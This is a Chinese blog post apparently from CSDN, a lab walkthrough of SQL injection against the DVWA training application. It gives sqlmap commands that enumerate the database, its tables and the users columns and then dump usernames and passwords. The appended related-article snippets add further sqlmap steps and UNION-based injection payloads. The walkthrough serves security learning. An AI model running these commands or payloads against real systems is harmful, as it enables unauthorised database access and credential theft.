Sql注入爆破--DVWA

最新推荐文章于 2024-03-24 22:07:38 发布
最新推荐文章于 2024-03-24 22:07:38 发布
阅读量1.2k 收藏 4
点赞数
分类专栏: 渗透测试演练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39421693/article/details/105314307
版权

Sql注入爆破:

  • 工具:Sqlmap、BurpSuit
  • 方法:利用BurpSuit抓包获取登录cookie进行爆破(实质是利用root账户)
  • DVWA级别:low

1)原理:

2)实战:

  • BurpSuit抓包

在SQL Injection 输入栏输入:1

 

  • 保存抓包数据

将抓包信息保存到本地文件test:

 

  • Sqlmap暴力破解

开启Sqlmap,输入:sqlmap -r /root/Desktop/test --current-db

(根据当前请求信息猜解当前数据库;猜想:破解的原理是什么?

猜解到数据库:‘dvwa’;进一步爆破该数据库表,输入:sqlmap -r /root/Desktop/test -D dvwa --tables

获取到两个表:guestbook、users,为了进一步破解密码,继续猜解users表

输入:sqlmap -r /root/Desktop/test -D dvwa -T users --columns

获取users表中字段,其中user和password字段内容是我们需要的,继续暴力破解

输入:sqlmap -r /root/Desktop/test -D dvwa -T users -C user,password --dump

暴力破解成功!获取账户和密码!

3)猜想:

 

 

 

 

HurryPotter
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
BurpSuite 爆破 SQL 注入
MZa1213123的博客
03-03 2068
靶场 用 burpsuite 进行抓包 (最好是用专业版 可以设置多线程快速爆破) 右键该页面 Send to Intruder 首先将 Attack type 改为 Cluster bomb 接着 Clear 清除全部变量 然后 Add 变量到 username 和 password 的地方 设置 payload payload 1 选择 Runtime file 也就是自己选择的字典 我这个是 kali 自带的 SQL.txt payload 2 选择 Simple lis
SQL注入爆破库、表、字段
qi_SJQ_的博客
11-03 4013
1.MySQL注入
SQL注入爆库渗透测试(初学者必看)
yi152787的博客
04-30 1872
爆库原理基本一致的,也许站点不同但只要存在sql注入则需要进行数据库爆破,步骤及使用的参数基本相同,对参数不够熟悉的网友可以去某百某博查看相关信息,本次实验结束,本文章仅提供参考,请勿在未授权的情况下进行测试。本次实验利用sqlmap爆破工具对SQL靶场进行渗透测试(数据库爆破),最终目标:拿到用户名和密码,实验中页面出现的用户名密码可忽略,真实实战中一般不会直接爆出用户名和密码的。5.在security爆出users,已确定目标所在,进行第三步爆破 所使用到的参数 -D -T --colimn;
SQL盲注之python脚本爆破sqlmap基础操作
wangringyi的博客
04-09 6103
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、SQL盲注是什么? 二、介绍与使用 1.盲注的三种分类 2.基于报错的盲注 3.基于时间的脚本化盲注 sqlmap的使用 前言 哈,我是爱挖洞的萝卜头,从今天开始来csdn分享学习过过程,学习经历,望各位大佬指教指教,嘿嘿嘿。 一、SQL盲注是什么? 经历过前面的数字型注入,字符型注入,提交方式注入等,我们对sql注入有了基本的...
sql注入-爆破数据库
Eric___Qu的博客
03-24 358
order by原理:会对列排序,当我们输入的列数超过实际拥有的列数,就会提示该列不存在。假设users表里有username,password两个字段。使用order by判断回显后(假设回显结果为2),使用。假设flag数据库里有users表,查看users表。假设需要查看的数据库为flag。
学习SQL注入基础笔记
Ruoten的博客
03-06 3892
mysql注入必懂的知识点 (1)在mysql5.0版本以上中,存在一个自带数据库名information_schema自带 记录所有数据库名 表名 列名 (2)table_schema:数据库名 (3)group_concat(table_name):查询所有的表 (4)table_name:表名 (5)column_name:字段名 (6)数据库中符号“.”代表下一级,如user.user表示数据库user下的user表 (7)information_schema.tables...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
DVWA-master.zip
01-04
DVWA-master.zip
2020-12-06-DVWA之sql.md
01-24
dvwa之sql
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
半自动化的注入爆破工具(PHP版)
03-27
此工具适用于不能使用UNION SELECT的情况,通过自己构造语句,可以爆出任何想要的数据. 由于不能做到多线程,并且受制于PHP的max_execution_time最大为30秒, 因此在网络不给力的情况下无法爆出所有想要的字符. 此时可以通过指定少数字符来逐段爆破. 另外, 目前只支持 and (select .... ) >={guess} 或者 and {guess}<=(select ...) 的情形.
简明SQLmap暴库
热门推荐
回忆式~过去.的博客
04-01 1万+
1、首先在网站找到 可能有sql注入的 url链接,图中凭感觉怀疑 id 参数有注入的可能 2、上sql map,检测这个url 3、稍等片刻后 扫描结果如图中,说明有注入,不做过多详细说明 4、既然有注入,直接 --dbs 爆破出 数据库名称 5、稍等片刻,sqlmap 告诉我们 找到三个数据库 6、maoshe 这个数据库应该是 该网站的数据库,直接 指定数据库 爆库 -D “maoshe” --dump-all 7、数据库中的表数据都被保存下来了 拿到admin 账号密码 就可以
sqlmap入门-爆库,爆表,列,字段
weixin_46626737的博客
11-14 6883
①当判断a为get注入点后(get) 可使用python sqlmap.py -u "url?a=1" --dbs爆数据库 假设结果中有member数据库 ②爆表 python sqlmap.py -u "url?a=1" --tables -D member 假设有表student ③爆列 python sqlmap.py -u "url?a=1" --column -T student -D member 假设有列id,password,stasus等列 ④爆字段 python sq
利用SQLi 进行数据库注入爆破爆库获取信息
weixin_42565036的博客
06-22 3296
SQLi数据库注入分析工具的使用目录什么是SQL注入?第一步,通过Dorks寻找网站的可爆破点找到可爆破的网站进一步筛选可爆破的网站进行数据库的读取选择其中一个数据库,读取里面的表类目成功爆破到用户信息创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 目录 本文仅供学习使用,请勿非法使用计算机系统进行网路攻击,这是不被法律所允许的!本文使用数据库S
sql爆破
weixin_44276341的博客
01-06 377
1' and 2=1 union select 1,database() -- - 1000' union select 1,(select group_concat(table_name) from information_schema.talbes where table_schema='dvwa') -- - 1000' union select 1,(select group_...
sqlmap工具说明
tlucky的博客
03-06 1506
版本:v1.4.10支持环境:windows,linux等支持语言:python设计目的:可自动执行SQL注入缺陷的检测和开发过程,并接管数据库服务器实现:有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数 据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令。,以及从数据 库指纹识别、从数据库获取数据、访问底层文件的广泛范围的交换机通过带外连接在操作系统上 执行命令。
爆破dvwa数据库
m0_65150886的博客
08-28 151
sqlmap.py -r bc.txt --dbs 查询所有的数据库。
dvwa爆数据库andsqlmap爆数据库
2301_77315080的博客
08-28 406
正常提交payload为1。
sql注入 dvwa
最新发布
06-17
DVWA(Damn Vulnerable Web Application)是一个开源的安全教育工具,它的目的是作为一个靶子,用于演示和学习各种Web应用程序安全漏洞,包括SQL注入。 在DVWA中,你可以找到一个名为"SQL Injection"的模块,这个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值